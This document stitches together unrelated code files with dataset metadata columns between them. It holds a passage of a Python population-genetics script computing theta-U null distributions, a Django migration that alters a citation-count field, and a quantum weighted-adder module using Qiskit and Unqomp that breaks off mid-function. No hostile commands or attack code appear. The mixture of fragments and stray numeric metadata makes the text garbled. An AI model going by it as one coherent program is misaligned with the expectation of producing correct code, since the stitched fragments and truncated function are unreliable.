asexR1Sites += currR1Values[1]
currR2Values = thetaUR2Dict[asexual]
asexR2S += currR2Values[0]
asexR2Sites += currR2Values[1]
currR3Values = thetaUR3Dict[asexual]
asexR3S += currR3Values[0]
asexR3Sites += currR3Values[1]
currR4Values = thetaUR4Dict[asexual]
asexR4S += currR4Values[0]
asexR4Sites += currR4Values[1]
currR5Values = thetaUR5Dict[asexual]
asexR5S += currR5Values[0]
asexR5Sites += currR5Values[1]
currR6Values = thetaUR6Dict[asexual]
asexR6S += currR6Values[0]
asexR6Sites += currR6Values[1]
currR7Values = thetaUR7Dict[asexual]
asexR7S += currR7Values[0]
asexR7Sites += currR7Values[1]
for sexual in sexList:
currSynValues = thetaUSDict[sexual]
sexSS += currSynValues[0]
sexSynSites += currSynValues[1]
currMeanCValues = thetaUmeanCDict[sexual]
sexMeanCS += currMeanCValues[0]
sexMeanCSites += currMeanCValues[1]
currMeanRValues = thetaUmeanRDict[sexual]
sexMeanRS += currMeanRValues[0]
sexMeanRSites += currMeanRValues[1]
currC1Values = thetaUC1Dict[sexual]
sexC1S += currC1Values[0]
sexC1Sites += currC1Values[1]
currC2Values = thetaUC2Dict[sexual]
sexC2S += currC2Values[0]
sexC2Sites += currC2Values[1]
currC3Values = thetaUC3Dict[sexual]
sexC3S += currC3Values[0]
sexC3Sites += currC3Values[1]
currC4Values = thetaUC4Dict[sexual]
sexC4S += currC4Values[0]
sexC4Sites += currC4Values[1]
currC5Values = thetaUC5Dict[sexual]
sexC5S += currC5Values[0]
sexC5Sites += currC5Values[1]
currC6Values = thetaUC6Dict[sexual]
sexC6S += currC6Values[0]
sexC6Sites += currC6Values[1]
currC7Values = thetaUC7Dict[sexual]
sexC7S += currC7Values[0]
sexC7Sites += currC7Values[1]
currR1Values = thetaUR1Dict[sexual]
sexR1S += currR1Values[0]
sexR1Sites += currR1Values[1]
currR2Values = thetaUR2Dict[sexual]
sexR2S += currR2Values[0]
sexR2Sites += currR2Values[1]
currR3Values = thetaUR3Dict[sexual]
sexR3S += currR3Values[0]
sexR3Sites += currR3Values[1]
currR4Values = thetaUR4Dict[sexual]
sexR4S += currR4Values[0]
sexR4Sites += currR4Values[1]
currR5Values = thetaUR5Dict[sexual]
sexR5S += currR5Values[0]
sexR5Sites += currR5Values[1]
currR6Values = thetaUR6Dict[sexual]
sexR6S += currR6Values[0]
sexR6Sites += currR6Values[1]
currR7Values = thetaUR7Dict[sexual]
sexR7S += currR7Values[0]
sexR7Sites += currR7Values[1]
asexThetaUS = float(asexSS)/(asexAn*(float(asexSynSites)/len(asexList)))
asexThetaUMeanC = float(asexMeanCS)/(asexAn*(float(asexMeanCSites)/len(asexList)))
asexThetaUMeanR = float(asexMeanRS)/(asexAn*(float(asexMeanRSites)/len(asexList)))
asexThetaUC1 = float(asexC1S)/(asexAn*(float(asexC1Sites)/len(asexList)))
asexThetaUC2 = float(asexC2S)/(asexAn*(float(asexC2Sites)/len(asexList)))
asexThetaUC3 = float(asexC3S)/(asexAn*(float(asexC3Sites)/len(asexList)))
asexThetaUC4 = float(asexC4S)/(asexAn*(float(asexC4Sites)/len(asexList)))
asexThetaUC5 = float(asexC5S)/(asexAn*(float(asexC5Sites)/len(asexList)))
asexThetaUC6 = float(asexC6S)/(asexAn*(float(asexC6Sites)/len(asexList)))
asexThetaUC7 = float(asexC7S)/(asexAn*(float(asexC7Sites)/len(asexList)))
asexThetaUR1 = float(asexR1S)/(asexAn*(float(asexR1Sites)/len(asexList)))
asexThetaUR2 = float(asexR2S)/(asexAn*(float(asexR2Sites)/len(asexList)))
asexThetaUR3 = float(asexR3S)/(asexAn*(float(asexR3Sites)/len(asexList)))
asexThetaUR4 = float(asexR4S)/(asexAn*(float(asexR4Sites)/len(asexList)))
asexThetaUR5 = float(asexR5S)/(asexAn*(float(asexR5Sites)/len(asexList)))
asexThetaUR6 = float(asexR6S)/(asexAn*(float(asexR6Sites)/len(asexList)))
asexThetaUR7 = float(asexR7S)/(asexAn*(float(asexR7Sites)/len(asexList)))
sexThetaUS = float(sexSS)/(sexAn*(float(sexSynSites)/len(sexList)))
sexThetaUMeanC = float(sexMeanCS)/(sexAn*(float(sexMeanCSites)/len(sexList)))
sexThetaUMeanR = float(sexMeanRS)/(sexAn*(float(sexMeanRSites)/len(sexList)))
sexThetaUC1 = float(sexC1S)/(sexAn*(float(sexC1Sites)/len(sexList)))
sexThetaUC2 = float(sexC2S)/(sexAn*(float(sexC2Sites)/len(sexList)))
sexThetaUC3 = float(sexC3S)/(sexAn*(float(sexC3Sites)/len(sexList)))
sexThetaUC4 = float(sexC4S)/(sexAn*(float(sexC4Sites)/len(sexList)))
sexThetaUC5 = float(sexC5S)/(sexAn*(float(sexC5Sites)/len(sexList)))
sexThetaUC6 = float(sexC6S)/(sexAn*(float(sexC6Sites)/len(sexList)))
sexThetaUC7 = float(sexC7S)/(sexAn*(float(sexC7Sites)/len(sexList)))
sexThetaUR1 = float(sexR1S)/(sexAn*(float(sexR1Sites)/len(sexList)))
sexThetaUR2 = float(sexR2S)/(sexAn*(float(sexR2Sites)/len(sexList)))
sexThetaUR3 = float(sexR3S)/(sexAn*(float(sexR3Sites)/len(sexList)))
sexThetaUR4 = float(sexR4S)/(sexAn*(float(sexR4Sites)/len(sexList)))
sexThetaUR5 = float(sexR5S)/(sexAn*(float(sexR5Sites)/len(sexList)))
sexThetaUR6 = float(sexR6S)/(sexAn*(float(sexR6Sites)/len(sexList)))
sexThetaUR7 = float(sexR7S)/(sexAn*(float(sexR7Sites)/len(sexList)))
if asexThetaUS != 0 and sexThetaUS != 0:
asexThetaUMeanC_thetaUS = asexThetaUMeanC/asexThetaUS
asexThetaUMeanR_thetaUS = asexThetaUMeanR/asexThetaUS
asexThetaUC1_thetaUS = asexThetaUC1/asexThetaUS
asexThetaUC2_thetaUS = asexThetaUC2/asexThetaUS
asexThetaUC3_thetaUS = asexThetaUC3/asexThetaUS
asexThetaUC4_thetaUS = asexThetaUC4/asexThetaUS
asexThetaUC5_thetaUS = asexThetaUC5/asexThetaUS
asexThetaUC6_thetaUS = asexThetaUC6/asexThetaUS
asexThetaUC7_thetaUS = asexThetaUC7/asexThetaUS
asexThetaUR1_thetaUS = asexThetaUR1/asexThetaUS
asexThetaUR2_thetaUS = asexThetaUR2/asexThetaUS
asexThetaUR3_thetaUS = asexThetaUR3/asexThetaUS
asexThetaUR4_thetaUS = asexThetaUR4/asexThetaUS
asexThetaUR5_thetaUS = asexThetaUR5/asexThetaUS
asexThetaUR6_thetaUS = asexThetaUR6/asexThetaUS
asexThetaUR7_thetaUS = asexThetaUR7/asexThetaUS
sexThetaUMeanC_thetaUS = sexThetaUMeanC/sexThetaUS
sexThetaUMeanR_thetaUS = sexThetaUMeanR/sexThetaUS
sexThetaUC1_thetaUS = sexThetaUC1/sexThetaUS
sexThetaUC2_thetaUS = sexThetaUC2/sexThetaUS
sexThetaUC3_thetaUS = sexThetaUC3/sexThetaUS
sexThetaUC4_thetaUS = sexThetaUC4/sexThetaUS
sexThetaUC5_thetaUS = sexThetaUC5/sexThetaUS
sexThetaUC6_thetaUS = sexThetaUC6/sexThetaUS
sexThetaUC7_thetaUS = sexThetaUC7/sexThetaUS
sexThetaUR1_thetaUS = sexThetaUR1/sexThetaUS
sexThetaUR2_thetaUS = sexThetaUR2/sexThetaUS
sexThetaUR3_thetaUS = sexThetaUR3/sexThetaUS
sexThetaUR4_thetaUS = sexThetaUR4/sexThetaUS
sexThetaUR5_thetaUS = sexThetaUR5/sexThetaUS
sexThetaUR6_thetaUS = sexThetaUR6/sexThetaUS
sexThetaUR7_thetaUS = sexThetaUR7/sexThetaUS
D1_mean = asexThetaUMeanC_thetaUS - sexThetaUMeanC_thetaUS
D1_1 = asexThetaUC1_thetaUS - sexThetaUC1_thetaUS
D1_2 = asexThetaUC2_thetaUS - sexThetaUC2_thetaUS
D1_3 = asexThetaUC3_thetaUS - sexThetaUC3_thetaUS
D1_4 = asexThetaUC4_thetaUS - sexThetaUC4_thetaUS
D1_5 = asexThetaUC5_thetaUS - sexThetaUC5_thetaUS
D1_6 = asexThetaUC6_thetaUS - sexThetaUC6_thetaUS
D1_7 = asexThetaUC7_thetaUS - sexThetaUC7_thetaUS
D2_mean = asexThetaUMeanR_thetaUS - sexThetaUMeanR_thetaUS
D2_1 = asexThetaUR1_thetaUS - sexThetaUR1_thetaUS
D2_2 = asexThetaUR2_thetaUS - sexThetaUR2_thetaUS
D2_3 = asexThetaUR3_thetaUS - sexThetaUR3_thetaUS
D2_4 = asexThetaUR4_thetaUS - sexThetaUR4_thetaUS
D2_5 = asexThetaUR5_thetaUS - sexThetaUR5_thetaUS
D2_6 = asexThetaUR6_thetaUS - sexThetaUR6_thetaUS
D2_7 = asexThetaUR7_thetaUS - sexThetaUR7_thetaUS
currD1_Mean = D1['mean']
currD1_1 = D1[1]
currD1_2 = D1[2]
currD1_3 = D1[3]
currD1_4 = D1[4]
currD1_5 = D1[5]
currD1_6 = D1[6]
currD1_7 = D1[7]
currD2_Mean = D2['mean']
currD2_1 = D2[1]
currD2_2 = D2[2]
currD2_3 = D2[3]
currD2_4 = D2[4]
currD2_5 = D2[5]
currD2_6 = D2[6]
currD2_7 = D2[7]
currD1_Mean.append(D1_mean)
currD1_1.append(D1_1)
currD1_2.append(D1_2)
currD1_3.append(D1_3)
currD1_4.append(D1_4)
currD1_5.append(D1_5)
currD1_6.append(D1_6)
currD1_7.append(D1_7)
currD2_Mean.append(D2_mean)
currD2_1.append(D2_1)
currD2_2.append(D2_2)
currD2_3.append(D2_3)
currD2_4.append(D2_4)
currD2_5.append(D2_5)
currD2_6.append(D2_6)
currD2_7.append(D2_7)
D1['mean'] = currD1_Mean
D1[1] = currD1_1
D1[2] = currD1_2
D1[3] = currD1_3
D1[4] = currD1_4
D1[5] = currD1_5
D1[6] = currD1_6
D1[7] = currD1_7
D2['mean'] = currD2_Mean
D2[1] = currD2_1
D2[2] = currD2_2
D2[3] = currD2_3
D2[4] = currD2_4
D2[5] = currD2_5
D2[6] = currD2_6
D2[7] = currD2_7
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
logfile.close()
sortedD1_1 = sorted(D1[1])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(1.0/32))) + '% complete\n')
logfile.close()
sortedD1_2 = sorted(D1[2])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(2.0/32))) + '% complete\n')
logfile.close()
sortedD1_3 = sorted(D1[3])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(3.0/32))) + '% complete\n')
logfile.close()
sortedD1_4 = sorted(D1[4])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(4.0/32))) + '% complete\n')
logfile.close()
sortedD1_5 = sorted(D1[5])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(5.0/32))) + '% complete\n')
logfile.close()
sortedD1_6 = sorted(D1[6])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(6.0/32))) + '% complete\n')
logfile.close()
sortedD1_7 = sorted(D1[7])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(7.0/32))) + '% complete\n')
logfile.close()
sortedD1_Mean = sorted(D1['mean'])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(8.0/32))) + '% complete\n')
logfile.close()
sortedD2_1 = sorted(D2[1])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(9.0/32))) + '% complete\n')
logfile.close()
sortedD2_2 = sorted(D2[2])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(10.0/32))) + '% complete\n')
logfile.close()
sortedD2_3 = sorted(D2[3])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(11.0/32))) + '% complete\n')
logfile.close()
sortedD2_4 = sorted(D2[4])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(12.0/32))) + '% complete\n')
logfile.close()
sortedD2_5 = sorted(D2[5])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(13.0/32))) + '% complete\n')
logfile.close()
sortedD2_6 = sorted(D2[6])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(14.0/32))) + '% complete\n')
logfile.close()
sortedD2_7 = sorted(D2[7])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(15.0/32))) + '% complete\n')
logfile.close()
sortedD2_Mean = sorted(D2['mean'])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(16.0/32))) + '% complete\n')
logfile.close()
i = 0
sys.stdout.write('D1_mean\tD2_mean\tD1_1\tD1_2\tD1_3\tD1_4\tD1_5\tD1_6\tD1_7\tD2_1\tD2_2\tD2_3\tD2_4\tD2_5\tD2_6\tD2_7\n')
while i < 10000:
sys.stdout.write(str(sortedD1_Mean[i]) + '\t' + str(sortedD2_Mean[i]) + '\t' + str(sortedD1_1[i]) + '\t' + str(sortedD1_2[i]) + '\t' + str(sortedD1_3[i]) + '\t' + str(sortedD1_4[i]) + '\t' + str(sortedD1_5[i]) + '\t' + str(sortedD1_6[i]) + '\t' + str(sortedD1_7[i]) + '\t' + str(sortedD2_1[i]) + '\t' + str(sortedD2_2[i]) + '\t' + str(sortedD2_3[i]) + '\t' + str(sortedD2_4[i]) + '\t' + str(sortedD2_5[i]) + '\t' + str(sortedD2_6[i]) + '\t' + str(sortedD2_7[i]) + '\n')
i += 1
logfile.close()
def thetaUSyn(fasta, code='invertebrateMt'):
    """Write a null distribution of Dsyn = thetaU-S(asexual) - thetaU-S(sexual) to stdout.

    Repeatedly (10,000 times) partitions the population sequences found in
    *fasta* into random, disjoint "sexual" (n=8) and "asexual" (n=23)
    subsets, computes a Watterson-style theta at synonymous sites for each
    subset from the precomputed per-sequence counts in ``thetaUSDict``, and
    records the difference.  The sorted differences are written to stdout,
    one per line, after a 'Dsyn' header; progress is appended to
    'mt_nullDistribution_thetaU-S.log'.

    Parameters:
        fasta -- path to the aligned FASTA file; passed to buildCodonDict()
                 to recover the list of sequence names.
        code  -- kept for backward compatibility.  The genetic-code table it
                 selected in the original implementation was dead code (never
                 read), so it has been removed; the parameter is ignored.

    Raises:
        ValueError -- if fewer than 31 population sequences are available
                 (the original rejection-sampling loops would hang forever).
    """
    logName = 'mt_nullDistribution_thetaU-S.log'

    def _log(text, mode='a'):
        # Open/write/close per message so the log can be tailed while the
        # long-running resampling loop is still executing.
        with open(logName, mode) as handle:
            handle.write(text)

    # Precomputed per-sequence (synonymous segregating sites, synonymous
    # site count) pairs.  Keys are FASTA headers; '$' marks population
    # (ingroup) sequences.
    thetaUSDict = {">$Heron2":(3,2598), ">$clone_1":(2,2598), ">$Rotoiti_1_4n":(2,2594.35416672), ">$AC51":(0,2598.33333333), ">$Heron_mitochondrion":(0,2599), ">$Grasmere_6_3n":(0,2599.62500001), ">$Poerua_triploid":(2,2597), ">$Brunner_6_3n":(2,2592.9583334), ">$McGregor":(0,2599), ">$Poerua_72_4n":(0,2605.47916675), ">$Gunn":(4,2597.66666667), ">$Grasmere_1_4n":(1,2628.66666703), ">$clone_7":(0,2592.85416667), ">$DenmarkA":(0,2593.125), ">$Duluth":(0,2591.52083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(3,2593.79166667), ">$Waik37":(0,2586.58333333), ">$Waik372":(4,2589.25), ">$Tarawera":(0,2586.58333333), ">$Kaniere_triploid":(1,2586.58333333), ">$Waik36":(14,2586.91666667), ">$WalesC":(2,2584.91666667), ">$Brunner_2_4n":(0,2593.60416674), ">$Lady":(9,2598.66666667), ">$Kaniere_1_2n":(9,2598.33333333), ">$Rotoroa_1_2n":(13,2598.58333338), ">$AlexMap":(0,2592.33333333), ">$Alexsex":(0,2592.33333333), ">$Yellow_Contig_56":(0,2592.33333333), ">$Ianthe":(4,2597), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(4,2595)}

    # Only the ordered name list is needed here; sequences without '$' are
    # outgroup and are ignored.
    _seqDict, seqList, _codonDict = buildCodonDict(fasta)
    popList = [seq for seq in seqList if '$' in seq]

    sexN = 8
    asexN = 23
    if len(popList) < sexN + asexN:
        raise ValueError('need at least %d population sequences, got %d'
                         % (sexN + asexN, len(popList)))
    # a_n correction factors (Watterson) for the two sample sizes.
    sexAn = aN(sexN)
    asexAn = aN(asexN)

    syn = []
    currPCT = 0
    _log('Calculating population genetic parameters:\n', mode='w')
    while len(syn) < 10000:
        newPCT = int(round(100 * len(syn) / 10000.0))
        if newPCT > currPCT:
            _log('\t' + str(newPCT) + '% complete\n')
            currPCT = newPCT
        # A single draw without replacement, split in two, yields the same
        # joint distribution as the original pair of rejection-sampling
        # loops, and cannot hang.
        drawn = random.sample(popList, sexN + asexN)
        sexList = drawn[:sexN]
        asexList = drawn[sexN:]
        asexSS = sum(thetaUSDict[name][0] for name in asexList)
        asexSynSites = sum(thetaUSDict[name][1] for name in asexList)
        sexSS = sum(thetaUSDict[name][0] for name in sexList)
        sexSynSites = sum(thetaUSDict[name][1] for name in sexList)
        # thetaU = S / (a_n * mean synonymous sites per sequence).
        asexThetaUS = float(asexSS) / (asexAn * (float(asexSynSites) / len(asexList)))
        sexThetaUS = float(sexSS) / (sexAn * (float(sexSynSites) / len(sexList)))
        syn.append(asexThetaUS - sexThetaUS)
    _log('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
    sys.stdout.write('Dsyn\n')
    for value in sorted(syn):
        sys.stdout.write(str(value) + '\n')
#thetaU(sys.argv[1])
| 95.756614
| 41,208
| 0.359461
| 51,331
| 416,254
| 2.830103
| 0.024332
| 0.006388
| 0.022337
| 0.004956
| 0.723512
| 0.709958
| 0.706785
| 0.696927
| 0.678066
| 0.666088
| 0
| 0.081706
| 0.329354
| 416,254
| 4,347
| 41,209
| 95.756614
| 0.438685
| 0.004014
| 0
| 0.731792
| 0
| 0.000925
| 0.159168
| 0.018544
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.000462
| null | null | 0.000231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cc37527fd6fb36a70bef772d339e0f69b79ded9
| 2,149
|
py
|
Python
|
src/bpp/migrations/0137_auto_20180613_0015.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/bpp/migrations/0137_auto_20180613_0015.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | 41
|
2019-11-07T00:07:02.000Z
|
2022-02-27T22:09:39.000Z
|
src/bpp/migrations/0137_auto_20180613_0015.py
|
iplweb/bpp
|
f027415cc3faf1ca79082bf7bacd4be35b1a6fdf
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-06-12 22:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 1.11): (re)declares the
    `liczba_cytowan` (citation count) field on four publication models.

    NOTE(review): only help_text/verbose_name metadata appear to change, so
    this AlterField set should be a no-op at the database level -- confirm.
    """

    dependencies = [
        ('bpp', '0136_ranking_liczba_cytowan'),
    ]

    operations = [
        # The same nullable PositiveIntegerField is declared on each of the
        # four models; per its help_text the value is refreshed from the
        # WOS AMR API when access is configured on the 'Uczelnia' object.
        migrations.AlterField(
            model_name='praca_doktorska',
            name='liczba_cytowan',
            field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n        skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n        czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
        ),
        migrations.AlterField(
            model_name='praca_habilitacyjna',
            name='liczba_cytowan',
            field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n        skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n        czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
        ),
        migrations.AlterField(
            model_name='wydawnictwo_ciagle',
            name='liczba_cytowan',
            field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n        skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n        czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
        ),
        migrations.AlterField(
            model_name='wydawnictwo_zwarte',
            name='liczba_cytowan',
            field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n        skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n        czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
        ),
    ]
| 59.694444
| 340
| 0.693811
| 241
| 2,149
| 6.070539
| 0.315353
| 0.054682
| 0.068353
| 0.079289
| 0.844839
| 0.818182
| 0.818182
| 0.818182
| 0.818182
| 0.818182
| 0
| 0.013142
| 0.221033
| 2,149
| 35
| 341
| 61.4
| 0.860812
| 0.032108
| 0
| 0.571429
| 1
| 0.142857
| 0.537313
| 0.013
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cdb3d555ec1919fdd88d2ca9ff936fb37f1634f
| 13,017
|
py
|
Python
|
unqomp/examples/weightedadder.py
|
eth-sri/Unqomp
|
9d7e885af1ebfdeab7e8059d13149aadeed8a6d6
|
[
"MIT"
] | 2
|
2022-01-26T08:49:00.000Z
|
2022-02-12T08:16:54.000Z
|
unqomp/examples/weightedadder.py
|
eth-sri/Unqomp
|
9d7e885af1ebfdeab7e8059d13149aadeed8a6d6
|
[
"MIT"
] | null | null | null |
unqomp/examples/weightedadder.py
|
eth-sri/Unqomp
|
9d7e885af1ebfdeab7e8059d13149aadeed8a6d6
|
[
"MIT"
] | null | null | null |
# Adapted from https://qiskit.org/documentation/_modules/qiskit/circuit/library/arithmetic/weighted_adder.html#WeightedAdder
from qiskit.circuit import QuantumRegister, QuantumCircuit
import numpy as np
from unqomp.uncomputation import uncomputeAllAncillas
from unqomp.ancillaallocation import AncillaRegister, AncillaCircuit
def makeWeightedAdder(num_state_qubits, weights):
    """Build an Unqomp AncillaCircuit adding ``weights[i]`` into a sum register
    for every state qubit ``i`` that is |1>.

    Straightforward implementation using Unqomp: uses fewer gates than the
    Qiskit version but more qubits, because a fresh carry ancilla register is
    allocated for every non-trivial weight (presumably uncomputed later by
    Unqomp's ancilla machinery — see ``uncomputeAllAncillas``).

    Adapted from Qiskit's WeightedAdder:
    https://qiskit.org/documentation/_modules/qiskit/circuit/library/arithmetic/weighted_adder.html#WeightedAdder

    :param num_state_qubits: number of state (control) qubits.
    :param weights: one weight per state qubit; values must be numerically
        close to integers. The caller's list is NOT modified (the previous
        version wrote the rounded values back in place, a surprising side
        effect).
    :return: an :class:`AncillaCircuit` over registers ``state`` and ``sum``
        plus per-weight carry ancilla registers.
    :raises ValueError: if any weight is not close to an integer.
    """
    # Number of sum qubits needed to hold sum(weights); at least 1.
    num_sum_qubits = int(np.floor(np.log2(sum(weights))) + 1) if sum(weights) > 0 else 1
    # Number of carry qubits required to compute the sum.
    num_carry_qubits = num_sum_qubits - 1

    # Validate and round the weights into a local list instead of mutating
    # the caller's argument.
    int_weights = []
    for weight in weights:
        if not np.isclose(weight, np.round(weight)):
            raise ValueError('Non-integer weights are not supported!')
        int_weights.append(int(np.round(weight)))

    qr_state = QuantumRegister(num_state_qubits, name='state')
    qr_sum = QuantumRegister(num_sum_qubits, name='sum')
    circuit = AncillaCircuit(qr_state, qr_sum)

    # Loop over state qubits and their corresponding weights.
    for i, weight in enumerate(int_weights):
        # Only act on non-trivial weights.
        if weight == 0:
            continue
        # State qubit controlling this weight's addition.
        q_state = qr_state[i]
        # Bit representation of the current weight, least-significant bit first.
        weight_binary = '{0:b}'.format(weight).rjust(num_sum_qubits, '0')[::-1]
        # Fresh carry ancillas for this weight.
        qr_carry = circuit.new_ancilla_register(num_carry_qubits, name="anccarryite" + str(i))
        # Add each bit of the current weight into the sum and carry registers.
        for j, bit in enumerate(weight_binary):
            if bit == '1':
                if num_sum_qubits == 1:
                    circuit.cx(q_state, qr_sum[j])
                elif j == 0:
                    # compute (q_sum[0] + 1) into (q_sum[0], q_carry[0])
                    # - controlled by q_state[i]
                    circuit.ccx(q_state, qr_sum[j], qr_carry[j])
                    circuit.cx(q_state, qr_sum[j])
                elif j == num_sum_qubits - 1:
                    # compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j])
                    # - controlled by q_state[i] / last qubit,
                    # no carry needed by construction
                    circuit.cx(q_state, qr_sum[j])
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
                else:
                    # compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j], q_carry[j])
                    # - controlled by q_state[i]
                    circuit.mcx([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], negated_ctrls=[1, 2])
                    circuit.cx(q_state, qr_carry[j])
                    circuit.cx(q_state, qr_sum[j])
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
            else:
                if num_sum_qubits == 1:
                    pass  # nothing to do, since nothing to add
                elif j == 0:
                    pass  # nothing to do, since nothing to add
                elif j == num_sum_qubits - 1:
                    # compute (q_sum[j] + q_carry[j-1]) into (q_sum[j])
                    # - controlled by q_state[i] / last qubit,
                    # no carry needed by construction
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
                else:
                    # compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
                    # - controlled by q_state[i]
                    circuit.mcx([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j])
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
    return circuit
def makesQiskitWA(num_state_qubits, weights):
    """Build the weighted adder as a plain Qiskit QuantumCircuit with explicit
    local uncomputation of the carry qubits after each weight.

    NOTE: the Qiskit library implementation still has a regression bug — the
    WeightedAdder uses the default 'noancilla' mode instead of 'basic' when
    asked for it — which is why the circuit is rebuilt here with
    ``mct(..., mode='basic')`` gates and a single shared control ancilla.

    :param num_state_qubits: number of state (control) qubits.
    :param weights: one weight per state qubit. Unlike :func:`makeWeightedAdder`
        this version performs no integer validation/rounding (unchanged from
        the original).
    :return: a :class:`QuantumCircuit` over registers ``state``, ``sum``,
        ``carry`` and, when needed, the shared ``ctrl`` ancilla.
    """
    # Number of sum qubits needed to hold sum(weights); at least 1.
    num_sum_qubits = int(np.floor(np.log2(sum(weights))) + 1) if sum(weights) > 0 else 1
    num_carry_qubits = num_sum_qubits - 1
    # The shared mct control ancilla is only needed once the Toffoli-like
    # gates have three controls, i.e. when num_sum_qubits > 2.
    # (The original assigned the bare bool comparison here.)
    num_control_qubits = 1 if num_sum_qubits > 2 else 0

    qr_state = QuantumRegister(num_state_qubits, name='state')
    qr_sum = QuantumRegister(num_sum_qubits, name='sum')
    qr_carry = QuantumRegister(num_carry_qubits, name='carry')
    qr_control = QuantumRegister(1, name='ctrl') if num_control_qubits > 0 else []
    circ = QuantumCircuit(qr_state, qr_sum, qr_carry)
    if num_control_qubits > 0:
        circ.add_register(qr_control)

    # Loop over state qubits and their corresponding weights.
    for i, weight in enumerate(weights):
        # Only act on non-trivial weights.
        if np.isclose(weight, 0):
            continue
        # State qubit controlling this weight's addition.
        q_state = qr_state[i]
        # Bit representation of the current weight, least-significant bit first.
        weight_binary = '{0:b}'.format(int(weight)).rjust(num_sum_qubits, '0')[::-1]
        # Add each bit of the current weight into the sum and carry registers.
        for j, bit in enumerate(weight_binary):
            if bit == '1':
                if num_sum_qubits == 1:
                    circ.cx(q_state, qr_sum[j])
                elif j == 0:
                    # compute (q_sum[0] + 1) into (q_sum[0], q_carry[0])
                    # - controlled by q_state[i]
                    circ.ccx(q_state, qr_sum[j], qr_carry[j])
                    circ.cx(q_state, qr_sum[j])
                elif j == num_sum_qubits - 1:
                    # compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j])
                    # - controlled by q_state[i] / last qubit,
                    # no carry needed by construction
                    circ.cx(q_state, qr_sum[j])
                    circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
                else:
                    # compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j], q_carry[j])
                    # - controlled by q_state[i]; X gates implement the
                    # negated controls around the mct
                    circ.x(qr_sum[j])
                    circ.x(qr_carry[j - 1])
